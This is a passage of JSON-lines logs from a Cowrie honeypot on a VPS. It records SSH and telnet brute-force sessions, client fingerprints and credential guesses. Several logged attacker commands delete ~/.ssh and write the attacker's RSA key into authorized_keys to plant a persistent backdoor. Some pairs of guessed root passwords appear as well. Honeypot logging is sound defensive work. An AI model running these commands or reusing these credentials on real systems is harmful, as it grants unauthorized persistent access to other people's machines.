com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:13:54.185075Z","src_ip":"14.103.112.104","session":"f1db7cf72509"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:13:57.633436Z","src_ip":"14.103.112.104","session":"f1db7cf72509"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:58.838971Z","src_ip":"14.103.112.104","session":"f1db7cf72509"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":46608,"dst_ip":"1.2.3.4","dst_port":22,"session":"a05b465a2db1","protocol":"ssh","message":"New connection: 14.103.112.104:46608 (1.2.3.4:22) [session: a05b465a2db1]","sensor":"my-vps","timestamp":"2025-09-09T05:13:59.689589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:13:59.690299Z","src_ip":"14.103.112.104","session":"a05b465a2db1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:13:59.892406Z","src_ip":"14.103.112.104","session":"a05b465a2db1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:14:00.738876Z","src_ip":"14.103.112.104","session":"a05b465a2db1"}
{"eventid":"cowrie.session.closed","duration":"25.2","message":"Connection lost after 25.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:00.930900Z","src_ip":"14.103.112.104","session":"0c506384ed78"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:00.941060Z","src_ip":"14.103.112.104","session":"a05b465a2db1"}
{"eventid":"cowrie.session.closed","duration":12.796958684921265,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:05.469993Z","src_ip":"60.19.222.5","session":"5efac9f48360"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50210,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d99967122c7","protocol":"ssh","message":"New connection: 217.72.205.35:50210 (1.2.3.4:22) [session: 6d99967122c7]","sensor":"my-vps","timestamp":"2025-09-09T05:14:10.587235Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:10.588342Z","src_ip":"217.72.205.35","session":"6d99967122c7"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":48169,"dst_ip":"1.2.3.4","dst_port":23,"session":"0813ea6402dc","protocol":"telnet","message":"New connection: 60.19.222.5:48169 (1.2.3.4:23) [session: 0813ea6402dc]","sensor":"my-vps","timestamp":"2025-09-09T05:14:12.674167Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":40654,"dst_ip":"1.2.3.4","dst_port":22,"session":"de84545be170","protocol":"ssh","message":"New connection: 14.103.112.104:40654 (1.2.3.4:22) [session: de84545be170]","sensor":"my-vps","timestamp":"2025-09-09T05:14:17.255807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:14:18.753520Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:14:18.754203Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.login.success","username":"root","password":"qweqwe11","message":"login attempt [root/qweqwe11] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:14:20.751782Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:14:21.214075Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:14:21.214800Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:14:21.215859Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:21.419923Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:14:22.695316Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:14:22.696084Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:14:22.903347Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:22.904261Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":53062,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cdaf19ea53c","protocol":"ssh","message":"New connection: 14.103.112.104:53062 (1.2.3.4:22) [session: 3cdaf19ea53c]","sensor":"my-vps","timestamp":"2025-09-09T05:14:23.087455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:14:23.092478Z","src_ip":"14.103.112.104","session":"3cdaf19ea53c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:14:23.280718Z","src_ip":"14.103.112.104","session":"3cdaf19ea53c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:14:24.045735Z","src_ip":"14.103.112.104","session":"3cdaf19ea53c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:25.236335Z","src_ip":"14.103.112.104","session":"3cdaf19ea53c"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":53074,"dst_ip":"1.2.3.4","dst_port":22,"session":"489e5d83d94b","protocol":"ssh","message":"New connection: 14.103.112.104:53074 (1.2.3.4:22) [session: 489e5d83d94b]","sensor":"my-vps","timestamp":"2025-09-09T05:14:25.422924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:14:25.428241Z","src_ip":"14.103.112.104","session":"489e5d83d94b"}
{"eventid":"cowrie.session.closed","duration":12.795226573944092,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:25.469323Z","src_ip":"60.19.222.5","session":"0813ea6402dc"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":48460,"dst_ip":"1.2.3.4","dst_port":23,"session":"dd2639aea62f","protocol":"telnet","message":"New connection: 60.19.222.5:48460 (1.2.3.4:23) [session: dd2639aea62f]","sensor":"my-vps","timestamp":"2025-09-09T05:14:25.766804Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:14:26.175448Z","src_ip":"14.103.112.104","session":"489e5d83d94b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:14:27.425003Z","src_ip":"14.103.112.104","session":"489e5d83d94b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:27.614887Z","src_ip":"14.103.112.104","session":"489e5d83d94b"}
{"eventid":"cowrie.session.closed","duration":"16.8","message":"Connection lost after 16.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:34.049691Z","src_ip":"14.103.112.104","session":"de84545be170"}
{"eventid":"cowrie.session.closed","duration":12.72730302810669,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:38.494032Z","src_ip":"60.19.222.5","session":"dd2639aea62f"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":48616,"dst_ip":"1.2.3.4","dst_port":23,"session":"9998fd75340d","protocol":"telnet","message":"New connection: 60.19.222.5:48616 (1.2.3.4:23) [session: 9998fd75340d]","sensor":"my-vps","timestamp":"2025-09-09T05:14:38.736353Z"}
{"eventid":"cowrie.session.closed","duration":12.78227972984314,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:14:51.518573Z","src_ip":"60.19.222.5","session":"9998fd75340d"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":48890,"dst_ip":"1.2.3.4","dst_port":23,"session":"69b37b017b28","protocol":"telnet","message":"New connection: 60.19.222.5:48890 (1.2.3.4:23) [session: 69b37b017b28]","sensor":"my-vps","timestamp":"2025-09-09T05:14:51.687402Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49846,"dst_ip":"1.2.3.4","dst_port":23,"session":"504e84140913","protocol":"telnet","message":"New connection: 212.227.235.229:49846 (1.2.3.4:23) [session: 504e84140913]","sensor":"my-vps","timestamp":"2025-09-09T05:14:54.308495Z"}
{"eventid":"cowrie.session.closed","duration":12.854086875915527,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:15:04.541425Z","src_ip":"60.19.222.5","session":"69b37b017b28"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":49039,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d71acf1cbbb","protocol":"telnet","message":"New connection: 60.19.222.5:49039 (1.2.3.4:23) [session: 6d71acf1cbbb]","sensor":"my-vps","timestamp":"2025-09-09T05:15:04.772691Z"}
{"eventid":"cowrie.session.closed","duration":12.614939212799072,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:15:17.387568Z","src_ip":"60.19.222.5","session":"6d71acf1cbbb"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":49184,"dst_ip":"1.2.3.4","dst_port":23,"session":"5cba28c77519","protocol":"telnet","message":"New connection: 60.19.222.5:49184 (1.2.3.4:23) [session: 5cba28c77519]","sensor":"my-vps","timestamp":"2025-09-09T05:15:17.546849Z"}
{"eventid":"cowrie.session.closed","duration":31.534302473068237,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:15:25.842733Z","src_ip":"212.227.235.229","session":"504e84140913"}
{"eventid":"cowrie.session.closed","duration":12.896060705184937,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:15:30.442843Z","src_ip":"60.19.222.5","session":"5cba28c77519"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":41464,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cf0314f7aa0","protocol":"ssh","message":"New connection: 14.103.112.104:41464 (1.2.3.4:22) [session: 5cf0314f7aa0]","sensor":"my-vps","timestamp":"2025-09-09T05:15:33.287733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:15:34.071786Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:15:34.072448Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.login.success","username":"root","password":"Sage","message":"login attempt [root/Sage] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:15:34.829287Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:15:36.122030Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:15:36.122720Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:15:36.123705Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:15:36.312570Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:15:36.792897Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:15:36.793633Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:15:36.982218Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:15:36.983080Z","src_ip":"14.103.112.104","session":"5cf0314f7aa0"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":41476,"dst_ip":"1.2.3.4","dst_port":22,"session":"71c90ab84b8b","protocol":"ssh","message":"New connection: 14.103.112.104:41476 (1.2.3.4:22) [session: 71c90ab84b8b]","sensor":"my-vps","timestamp":"2025-09-09T05:15:37.165781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:15:37.166677Z","src_ip":"14.103.112.104","session":"71c90ab84b8b"}
